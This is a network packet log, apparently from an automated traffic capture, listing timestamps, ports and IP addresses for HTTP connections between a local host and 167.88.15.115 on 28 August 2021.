Aug 28, 2021 00:05:54.439321041 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:54.562279940 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:54.562386036 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:54.684902906 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:54.955670118 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:55.026015043 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:55.070502043 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:55.193283081 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:55.196311951 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:55.319139004 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:55.590168953 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:55.592959881 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:55.716059923 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:55.716187000 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:55.838960886 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.103768110 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.103898048 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.103938103 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.103967905 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.103975058 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.104013920 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.104044914 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.104073048 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.104100943 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.104135036 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.104136944 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.104173899 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.104190111 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.104222059 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.104281902 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.178241014 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.228257895 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235193014 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235255003 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235291958 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235312939 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.235330105 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235372066 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235399008 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.235434055 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.235490084 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235549927 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235586882 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235624075 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.235625029 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235662937 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235686064 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.235697985 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235754967 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.235778093 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235820055 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235856056 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235873938 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.235882998 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.235963106 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.307765961 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.307878017 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.308145046 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.365742922 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.365814924 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.365852118 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.365879059 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.365896940 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.365917921 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.365955114 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.365971088 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.365993977 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.366007090 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.366020918 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.366067886 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.366072893 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.366110086 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.366147995 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.366163015 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.366174936 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.366224051 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.437387943 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.437504053 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.496565104 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496608973 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496638060 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496655941 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496685028 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.496687889 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496723890 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.496740103 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496778965 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496803045 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.496833086 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496871948 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496897936 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496912003 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.496937037 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.496958971 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.496978045 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.497004032 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.497051954 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.497088909 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.497107029 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.497158051 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.566832066 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.624118090 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:56.890126944 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:56.896481991 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.025891066 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.026319027 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.156795025 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.330709934 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.430432081 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.455862045 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.456717968 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.456890106 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.457129002 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.581768990 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.581892967 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.584918022 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.585344076 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.706031084 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.714576960 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.973809958 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.973867893 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.973916054 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.973958015 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.973978996 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.973994970 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.974011898 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.974034071 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.974062920 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.974087000 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.974097967 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.974137068 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.974147081 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:57.974174023 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:57.974277973 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.037547112 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.043174028 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.103416920 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103440046 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103451967 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103463888 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103476048 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103487015 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103543997 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.103565931 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103590012 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.103636980 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103656054 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103672028 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103686094 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103703022 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.103713989 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.103743076 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.103777885 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.103915930 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.167273998 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.167855024 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.225131035 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.225162029 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.225178957 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.225189924 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.225208044 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.225224018 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.225248098 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.225296974 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.232609987 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.232640028 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.232660055 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.232718945 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.232743979 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.232877970 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.232892990 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.232959032 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.292378902 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.350799084 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.350858927 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.350902081 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.350929022 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.350938082 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.350985050 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.350996971 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.351037979 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351075888 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351087093 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.351104021 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351171970 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351207972 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351253986 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351257086 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.351284981 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351289988 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.351320982 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351357937 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351367950 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.351392031 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.351396084 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.433233976 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.555870056 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.566859007 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.691426992 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:58.692398071 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:58.818053961 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.078629017 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.078705072 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.078772068 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.078811884 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.078855991 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.078917027 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.078917980 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.078946114 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.078963041 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.079014063 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.079041958 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.079061031 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.079133034 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.079138041 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.079194069 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.204245090 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.204490900 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.204669952 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.204694033 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.204736948 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.204792976 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.204823017 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.204849005 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.204905033 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.204937935 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.204963923 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.204993010 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.204999924 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.205044031 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.205105066 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.205138922 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.205169916 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.205192089 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.205204964 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.205244064 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.205295086 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.205331087 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.205348015 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.205389023 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.331289053 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331362009 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331419945 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331473112 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331515074 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331516981 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.331557035 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331558943 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.331583977 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331612110 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.331624985 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331660032 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331706047 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331734896 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.331737041 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.331748009 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.433341026 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.457722902 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.457789898 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.457844973 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.457885981 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.457931995 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.457936049 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.457982063 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.457989931 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.458030939 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.458035946 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.458076954 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.458125114 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.458172083 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.458177090 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.458219051 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.458223104 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.458270073 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.458316088 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.458360910 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:05:59.458367109 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:05:59.458410025 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:13.036319971 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:13.160357952 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:13.160466909 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:13.161226988 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:13.285134077 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:13.285268068 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:13.409313917 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:13.737119913 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:13.747998953 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:13.872376919 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:13.872446060 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:13.996546984 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.274364948 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.306301117 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.430234909 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.430339098 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.554238081 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813462973 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813517094 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813554049 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813582897 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813618898 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813647985 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.813667059 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813677073 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.813708067 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813710928 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.813735008 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813772917 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813811064 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.813812017 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.813913107 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.937855959 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.937892914 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.938004971 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.939157963 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939205885 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939239979 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939263105 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939291954 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939320087 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939349890 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939378023 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939415932 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939448118 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939467907 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939497948 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939528942 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939557076 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939578056 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:14.939630032 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.939651012 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.939656019 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.939659119 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:14.939763069 CEST	49717	80	192.168.2.3	167.88.15.115
